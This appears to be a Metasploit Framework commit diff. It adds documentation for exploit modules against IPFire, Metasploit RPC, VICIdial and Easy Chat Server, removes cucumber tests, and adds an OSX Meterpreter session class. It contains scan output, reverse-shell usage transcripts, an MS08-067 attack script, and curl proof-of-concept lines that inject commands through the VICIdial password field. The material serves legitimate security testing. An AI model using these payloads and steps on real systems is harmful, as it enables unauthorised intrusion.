[+] 10.4.18.26:3389 - Identified RDP
[+] 10.4.18.22:3389 - Identified RDP
[+] 10.4.18.89:3389 - Identified RDP
[+] 10.4.18.9:3389 - Identified RDP
[+] 10.4.18.67:3389 - Identified RDP
[+] 10.4.18.80:3389 - Identified RDP
[+] 10.4.18.34:3389 - Identified RDP
[+] 10.4.18.70:3389 - Identified RDP
[+] 10.4.18.30:3389 - Identified RDP
[+] 10.4.18.76:3389 - Identified RDP
[+] 10.4.18.13:3389 - Identified RDP
[+] 10.4.18.91:3389 - Identified RDP
[+] 10.4.18.5:3389 - Identified RDP
[+] 10.4.18.47:3389 - Identified RDP
[+] 10.4.18.41:3389 - Identified RDP
[+] 10.4.18.105:3389 - Identified RDP
[*] Scanned 44 of 256 hosts (17% complete)
[*] Scanned 55 of 256 hosts (21% complete)
[+] 10.4.18.118:3389 - Identified RDP
[+] 10.4.18.108:3389 - Identified RDP
[+] 10.4.18.139:3389 - Identified RDP
[*] Scanned 94 of 256 hosts (36% complete)
[*] Scanned 110 of 256 hosts (42% complete)
[+] 10.4.18.157:3389 - Identified RDP
[+] 10.4.18.166:3389 - Identified RDP
[+] 10.4.18.164:3389 - Identified RDP
[+] 10.4.18.170:3389 - Identified RDP
[+] 10.4.18.185:3389 - Identified RDP
[+] 10.4.18.209:3389 - Identified RDP
[+] 10.4.18.188:3389 - Identified RDP
[*] Scanned 156 of 256 hosts (60% complete)
[+] 10.4.18.237:3389 - Identified RDP
[+] 10.4.18.225:3389 - Identified RDP
[*] Scanned 186 of 256 hosts (72% complete)
[*] Scanned 194 of 256 hosts (75% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 253 of 256 hosts (98% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```


@ -0,0 +1,48 @@
## Vulnerable Application
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
This module has been verified against:
1. 2.19 core 100
2. 2.19 core 110 (exploit-db, not metasploit module)
## Verification Steps
1. Install the firewall
2. Start msfconsole
3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
4. Do: ```set password admin``` or whatever it was set to at install
5. Do: ```set rhost 10.10.10.10```
6. Do: ```set payload cmd/unix/reverse_perl```
7. Do: ```set lhost 192.168.2.229```
8. Do: ```exploit```
9. You should get a shell.
## Options
**PASSWORD**
Password is set at install. May be blank, 'admin', or 'ipfire'.
## Scenarios
```
msf > use exploit/linux/http/ipfire_oinkcode_exec
msf exploit(ipfire_oinkcode_exec) > set password admin
password => admin
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
rhost => 192.168.2.201
msf exploit(ipfire_oinkcode_exec) > set verbose true
verbose => true
msf exploit(ipfire_oinkcode_exec) > check
[*] 192.168.2.201:444 The target appears to be vulnerable.
msf exploit(ipfire_oinkcode_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
id
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
whoami
nobody
```


@ -0,0 +1,142 @@
## Description
This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface.
## Vulnerable Application
[Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.
To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.
This module has been tested successfully on:
* Metasploit 4.15 on Kali 1.0.6
* Metasploit 4.14 on Kali 2017.1
* Metasploit 4.14 on Windows 7 SP1
Source and Installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/multi/misc/msf_rpc_console`
3. Do: `set RHOST [IP]`
4. Do: `set RPORT [PORT]` (default: `55552`)
5. Do: `set USERNAME [USERNAME]` (default: `msf`)
6. Do: `set PASSWORD [PASSWORD]`
7. Do: `set LHOST [IP]`
8. Do: `run`
9. You should get a session
## Options
**Username**
The username for Metasploit RPC (default: `msf`).
**Password**
The password for the RPC user.
## Scenarios
### Ruby Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 0
msf exploit(msf_rpc_console) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #0
[*] 172.16.191.166:55552 - Sending payload...
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400
whoami
win-sgbsd5tqutq\user
```
### Windows CMD Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 1
msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf exploit(msf_rpc_console) > run
[*] Started reverse SSL handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #1
[*] 172.16.191.166:55552 - Sending payload...
[*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400
Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\metasploit>whoami
win-sgbsd5tqutq\user
```
### Unix CMD Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.215
rhost => 172.16.191.215
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 2
target => 2
msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(msf_rpc_console) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.215:55552 - Authenticated successfully
[*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
[*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
[*] 172.16.191.215:55552 - API version 1.0
[+] 172.16.191.215:55552 - Created console #0
[*] 172.16.191.215:55552 - Sending payload...
[*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400
id
uid=0(root) gid=0(root) groups=0(root)
```


@ -0,0 +1,133 @@
## Description
This module exploits a vulnerability in VICIdial versions 2.9 RC1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default).
When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to `exec()`.
This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
## Vulnerable Application
VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well.
This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
Installers:
* [VICIdial 2.11 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download)
* [VICIdial 2.13 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.13rc1.zip/download)
Follow the [instructions to enabled password encryption](http://vicidial.org/docs/ENCRYPTED_PASSWORDS.txt).
## Technical Details
The `functions.php` file defines a function called `user_authorization`:
```php
function user_authorization($user,$pass,$user_option,$user_update)
```
This function is used throughout the application to validate user logon credentials supplied using HTTP basic authentication. If password encryption is enabled the user's password is passed to the `pass` argument of the `bp.pl` Perl script, without quotes, using PHP's `exec()` function:
```php
if ($SSpass_hash_enabled > 0)
{
if (file_exists("../agc/bp.pl"))
{$pass_hash = exec("../agc/bp.pl --pass=$pass");}
else
{$pass_hash = exec("../../agc/bp.pl --pass=$pass");}
```
A rudimentary blacklist is used to prevent command injection. The apostrophe `'`, quote `"`, semi-colon `;` and backslash `\` characters are removed from the user's username and password using `preg_replace`, like so:
```php
$user = preg_replace("/\'|\"|\\\\|;/","",$user);
$pass = preg_replace("/\'|\"|\\\\|;/","",$pass);
```
It is trivial to bypass the blacklist.
For example, backticks ``` ` ```, pipe `|` or ampersand `&` are sufficient to bypass the blacklist and execute arbitrary operating system commands.
For the purposes of exploitation, reaching the `user_authorization` function call with malicious input is hindered by additional input validation in use prior to the authentication check throughout the majority of the codebase:
```php
$PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_USER);
$PHP_AUTH_PW = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_PW);
```
However, in VICIdial version 2.11RC2, at least two files did not make use of the additional validation:
* help.php
* vicidial_sales_viewer.php
In VICIdial version 2.13RC1, at least one file did not make use of the additional validation:
* vicidial_sales_viewer.php
This vulnerability was patched in revision 2759.
## Proof of Concept
```bash
$ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" \
--user 'anyusername:anypassword& id>/tmp/pwned_by_sales_viewer #'
```
```bash
$ curl -isk "https://VICIdial.local/vicidial/help.php" \
--user 'anyusername:anypassword& id>/tmp/pwned_by_help #'
```
Note that `/tmp/pwned_by_help` and `/tmp/pwned_by_sales_viewer` files should contain the results of the `id` command.
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec`
3. Do: `set rhost [IP]`
4. Do: `run`
5. You should get a session
## Sample Output
```
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
[*] 172.16.191.150:80 The target appears to be vulnerable.
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[*] 172.16.191.150:80 Sending payload (505 bytes)
[+] 172.16.191.150:80 Payload sent successfully
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400
id
uid=48(apache) gid=48(apache) groups=48(apache)
```
## Sample Output (Verbose)
```
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true
verbose => true
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
[*] 172.16.191.150:80 Password encryption is supported, but may not be enabled.
[*] 172.16.191.150:80 The target appears to be vulnerable.
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[*] 172.16.191.150:80 Sending payload (505 bytes)
[+] 172.16.191.150:80 Payload sent successfully
[*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400
id
uid=48(apache) gid=48(apache) groups=48(apache)
```


@ -0,0 +1,53 @@
## Description
This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.
This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application
## Vulnerable Application
[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.
This module has been tested successfully on
* Easy Chat Server 3.1 on Windows XP En SP3
Installers:
[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe)
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploits/windows/http/easychatserver_seh`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed
## Scenarios
```
marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
meterpreter > sysinfo
Computer : MM-8B040C5B05D9
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
msf exploit(easychatserver_seh) >
```


@ -1,8 +1,8 @@
## Description ## Description
This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain. This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain.
This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application
## Vulnerable Application ## Vulnerable Application


@ -154,7 +154,7 @@ Process 2076 created.
To pass an argument, use the ```-a``` flag: To pass an argument, use the ```-a``` flag:
``` ```
meterpreter > execute -f iexplore.exe -a http://metasploit.com meterpreter > execute -f iexplore.exe -a https://metasploit.com
Process 2016 created. Process 2016 created.
``` ```


@ -1,4 +1,5 @@
## Creating A Testing Environment ## Creating A Testing Environment
To use this module you need an x86 executable type meterpreter on a x64 windows machine. To use this module you need an x86 executable type meterpreter on a x64 windows machine.
This module has been tested against: This module has been tested against:
@ -23,6 +24,7 @@ This module was not tested against, but may work against:
### Windows 10 x64 ### Windows 10 x64
```
msf exploit(handler) > run msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567 [*] Started reverse TCP handler on <MSF_IP>:4567
@ -71,3 +73,4 @@ This module was not tested against, but may work against:
Domain : WORKGROUP Domain : WORKGROUP
Logged On Users : 2 Logged On Users : 2
Meterpreter : x64/windows Meterpreter : x64/windows
```


@ -1,111 +0,0 @@
Feature: Help command
Background:
Given I run `msfconsole --defer-module-loads -q -x help -x exit`
Scenario: The 'help' command's output
Then the output should contain:
"""
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
irb Drop into irb scripting mode
load Load a framework plugin
quit Exit the console
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
Module Commands
===============
Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
edit Edit the current module with the preferred editor
info Displays information about one or more modules
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Selects a module by name
Job Commands
============
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job
Resource Script Commands
========================
Command Description
------- -----------
makerc Save commands entered since start to a file
resource Run the commands stored in a file
Database Backend Commands
=========================
Command Description
------- -----------
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Credentials Backend Commands
============================
Command Description
------- -----------
creds List all credentials in the database
"""


@ -1,48 +0,0 @@
@targets @db
Feature: MS08-067 netapi
Background:
Given a directory named "home"
And I cd to "home"
And a mocked home directory
Scenario: The MS08-067 should get a session with bind_tcp
Given I ready the windows targets
Given a file named "ms08-067-bind.rc" with:
"""
<ruby>
self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
payload_name = 'windows/meterpreter/bind_tcp'
exploited_hosts = []
failed_hosts = []
hosts.each do |host|
print_status("Trying MS08-067 against #{host['ipAddress']}")
mod = framework.exploits.create('windows/smb/ms08_067_netapi')
mod.datastore['PAYLOAD'] = payload_name
mod.datastore['RHOST'] = host['ipAddress']
m = mod.exploit_simple(
'LocalInput' => nil,
'LocalOutput' => nil,
'Payload' => payload_name,
'RunAsJob' => false
)
sleep(1)
if m
exploited_hosts << host['ipAddress']
else
failed_hosts << host['ipAddress']
end
end
print_status("Exploited hosts: #{exploited_hosts.inspect}")
print_status("Failed hosts: #{failed_hosts.inspect}")
self.run_single('sessions -K')
</ruby>
"""
When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
Then the 'Mdm::Host' table contains the expected targets


@ -1,153 +0,0 @@
@boot
Feature: `msfconsole` `database.yml`
In order to connect to the database in `msfconsole`
As a user calling `msfconsole` from a terminal
I want to be able to set the path of the `database.yml` in one of 4 locations (in order of precedence):
1. An explicit argument to the `-y` flag to `msfconsole`
2. The MSF_DATABASE_CONFIG environment variable
3. The user's `~/.msf4/database.yml`
4. `config/database.yml` in the metasploit-framework checkout location.
Scenario: With all 4 locations, --yaml wins
Given a file named "command_line.yml" with:
"""
test:
adapter: postgresql
database: command_line_metasploit_framework_test
username: command_line_metasploit_framework_test
"""
And a file named "msf_database_config.yml" with:
"""
test:
adapter: postgresql
database: environment_metasploit_framework_test
username: environment_metasploit_framework_test
"""
And I set the environment variables to:
| variable | value |
| MSF_DATABASE_CONFIG | msf_database_config.yml |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And a directory named ".msf4"
And I cd to ".msf4"
And a file named "database.yml" with:
"""
test:
adapter: postgresql
database: user_metasploit_framework_test
username: user_metasploit_framework_test
"""
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit --yaml command_line.yml`
Then the output should contain "command_line_metasploit_framework_test"
Scenario: Without --yaml, MSF_DATABASE_CONFIG wins
Given a file named "msf_database_config.yml" with:
"""
test:
adapter: postgresql
database: environment_metasploit_framework_test
username: environment_metasploit_framework_test
"""
And I set the environment variables to:
| variable | value |
| MSF_DATABASE_CONFIG | msf_database_config.yml |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And a directory named ".msf4"
And I cd to ".msf4"
And a file named "database.yml" with:
"""
test:
adapter: postgresql
database: user_metasploit_framework_test
username: user_metasploit_framework_test
"""
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
Then the output should contain "environment_metasploit_framework_test"
Scenario: Without --yaml or MSF_DATABASE_CONFIG, ~/.msf4/database.yml wins
Given I unset the environment variables:
| variable |
| MSF_DATABASE_CONFIG |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And a directory named ".msf4"
And I cd to ".msf4"
And a file named "database.yml" with:
"""
test:
adapter: postgresql
database: user_metasploit_framework_test
username: user_metasploit_framework_test
"""
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
Then the output should contain "user_metasploit_framework_test"
Scenario: Without --yaml, MSF_DATABASE_CONFIG or ~/.msf4/database.yml, project "database.yml" wins
Given I unset the environment variables:
| variable |
| MSF_DATABASE_CONFIG |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
Then the output should contain "project_metasploit_framework_test"
Scenario: Without --yaml, MSF_DATABASE_CONFIG, ~/.msf4/database.yml, or project "database.yml", no database connection
Given I unset the environment variables:
| variable |
| MSF_DATABASE_CONFIG |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And I cd to "../.."
And the project "database.yml" does not exist
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
Then the output should not contain "command_line_metasploit_framework_test"
And the output should not contain "environment_metasploit_framework_test"
And the output should not contain "user_metasploit_framework_test"
And the output should not contain "project_metasploit_framework_test"
And the output should contain "[*] postgresql selected, no connection"
Scenario: Starting `msfconsole` with a valid database.yml
When I run `msfconsole -q --defer-module-loads --execute-command db_status --execute-command exit`
Then the output should contain "[*] postgresql connected to metasploit_framework_test"


@ -1,20 +0,0 @@
Given /^I unset the environment variables:$/ do |table|
table.hashes.each do |row|
variable = row['variable'].to_s.upcase
# @todo add extension to Announcer
announcer.instance_eval do
if @options[:env]
print "$ unset #{variable}"
end
end
current_value = ENV.delete(variable)
# if original_env already has the key, then the true original was already recorded from a previous unset or set,
# so don't record the current value as it will cause ENV not to be restored after the Scenario.
unless original_env.key? variable
original_env[variable] = current_value
end
end
end


@ -1,14 +0,0 @@
require 'metasploit/framework/database/cucumber'
Given /^the project "database.yml" does not exist$/ do
Metasploit::Framework::Database::Cucumber.backup_project_configurations
end
Given /^the project "database.yml" exists with:$/ do |file_content|
Metasploit::Framework::Database::Cucumber.backup_project_configurations
File.open(Metasploit::Framework::Database::Cucumber.project_configurations_path, 'wb') { |file| file.write(file_content) }
end
After do
Metasploit::Framework::Database::Cucumber.restore_project_configurations
end


@ -1,26 +0,0 @@
#!/usr/bin/env ruby
case ARGV[0]
when 'size'
puts "30 134"
when '-a'
puts <<EOS
speed 38400 baud; 30 rows; 134 columns;
lflags: icanon isig iexten echo echoe echok echoke -echonl echoctl
-echoprt -altwerase -noflsh -tostop -flusho pendin -nokerninfo
-extproc
iflags: -istrip icrnl -inlcr -igncr ixon -ixoff ixany imaxbel iutf8
-ignbrk brkint -inpck -ignpar -parmrk
oflags: opost onlcr -oxtabs -onocr -onlret
cflags: cread cs8 -parenb -parodd hupcl -clocal -cstopb -crtscts -dsrflow
-dtrflow -mdmbuf
cchars: discard = ^O; dsusp = ^Y; eof = ^D; eol = <undef>;
eol2 = <undef>; erase = ^?; intr = ^C; kill = ^U; lnext = ^V;
min = 1; quit = ^\; reprint = ^R; start = ^Q; status = ^T;
stop = ^S; susp = ^Z; time = 0; werase = ^W;
EOS
when '-g'
puts "gfmt1:cflag=4b00:iflag=6b02:lflag=200005cf:oflag=3:discard=f:dsusp=19:eof=4:eol=ff:eol2=ff:erase=7f:intr=3:kill=15:lnext=16:min=1:quit=1c:reprint=12:start=11:status=14:stop=13:susp=1a:time=0:werase=17:ispeed=38400:ospeed=38400"
end
exit 0


@ -1,34 +0,0 @@
# @note `require 'simplecov'` is not used here because all features currently use external `msfconsole` process, so only
# that child process needs to load 'simplecov'.
# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
# It is recommended to regenerate this file in the future when you upgrade to a
# newer version of cucumber-rails. Consider adding your own code to a new file
# instead of editing this one. Cucumber will automatically load all features/**/*.rb
# files.
require 'cucumber/rails'
require 'aruba/cucumber'
# Capybara defaults to XPath selectors rather than Webrat's default of CSS3. In
# order to ease the transition to Capybara we set the default here. If you'd
# prefer to use XPath just remove this line and adjust any selectors in your
# steps to use the XPath syntax.
Capybara.default_selector = :css
# By default, any exception happening in your Rails application will bubble up
# to Cucumber so that your scenario will fail. This is a different from how
# your application behaves in the production environment, where an error page will
# be rendered instead.
#
# Sometimes we want to override this default behaviour and allow Rails to rescue
# exceptions and display an error page (just like when the app is running in production).
# Typical scenarios where you want to do this is when you test your error pages.
# There are two ways to allow Rails to rescue exceptions:
#
# 1) Tag your scenario (or feature) with @allow-rescue
#
# 2) Set the value below to true. Beware that doing this globally is not
# recommended as it will mask a lot of errors for you!
#
ActionController::Base.allow_rescue = false


@ -1,39 +0,0 @@
Before do
set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
set_env('RAILS_ENV', 'test')
@aruba_timeout_seconds = 8.minutes
end
Before('@db') do |scenario|
dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
ActiveRecord::Base.establish_connection(dbconfig["test"])
end
# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
# unless Bundler.settings.without.include?(:coverage)
# Before do |scenario|
# command_name = case scenario
# when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline
# "#{scenario.feature.title} #{scenario.name}"
# when Cucumber::Ast::OutlineTable::ExampleRow
# scenario_outline = scenario.scenario_outline
#
# "#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}"
# else
# raise TypeError, "Don't know how to extract command name from #{scenario.class}"
# end
#
# # Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead
# # of overwriting each other as 'Cucumber Features'
# set_env('SIMPLECOV_COMMAND_NAME', command_name)
#
# simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup')
# # set environment variable so child processes will merge their coverage data with parent process's coverage data.
# set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}")
# end
#
# Before('@db') do |scenario|
# dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
# ActiveRecord::Base.establish_connection(dbconfig["test"])
# end
# end


@ -1,16 +0,0 @@
# @note this file is loaded in env.rb to setup simplecov using RUBYOPTs for child processes
simplecov_command_name = ENV['SIMPLECOV_COMMAND_NAME']
# will not be set if hook does not run because `bundle install --without coverage`
if simplecov_command_name
require 'simplecov'
require 'pathname'
root = Pathname(__FILE__).expand_path.parent.parent.parent
SimpleCov.command_name(simplecov_command_name)
SimpleCov.root(root)
load root.join('.simplecov')
end


@ -1,11 +0,0 @@
require 'pathname'
support = Pathname.new(__FILE__).realpath.parent
paths = [
# adds support/bin at the front of the path so that the support/bin/stty script will be used to fake system stty
# output.
support.join('bin').to_path,
ENV['PATH']
]
ENV['PATH'] = paths.join(File::PATH_SEPARATOR)


@ -1,7 +0,0 @@
windows:
-
hostname: wxpsp0
ip: 127.0.0.100
-
hostname: wxpsp2
ip: 127.0.0.101


@ -1,36 +0,0 @@
require 'metasploit/framework/database'
module Metasploit::Framework::Database::Cucumber
def self.project_configurations_path
Rails.root.join('config', 'database.yml').to_path
end
def self.backup_project_configurations
if File.exist?(project_configurations_path)
# assume that the backup file is from a previously aborted run and it contains the real database.yml data, so
# just delete the fake database.yml and the After hook will restore the real database.yml from the backup location
if File.exist?(backup_project_configurations_path)
File.delete(project_configurations_path)
else
# project contains the real database.yml and there was no previous, aborted run.
File.rename(project_configurations_path, backup_project_configurations_path)
end
end
end
def self.backup_project_configurations_path
"#{project_configurations_path}.cucumber.bak"
end
def self.restore_project_configurations
if File.exist?(backup_project_configurations_path)
if File.exist?(project_configurations_path)
# Remove fake, leftover database.yml
File.delete(project_configurations_path)
end
File.rename(backup_project_configurations_path, project_configurations_path)
end
end
end


@ -30,7 +30,7 @@ module Metasploit
end end
end end
VERSION = "4.15.1" VERSION = "4.15.4"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev' PRERELEASE = 'dev'
HASH = get_hash HASH = get_hash


@ -4,7 +4,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
## ##


@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'osx'
self.base_arch = ARCH_X64
end
end
end
end
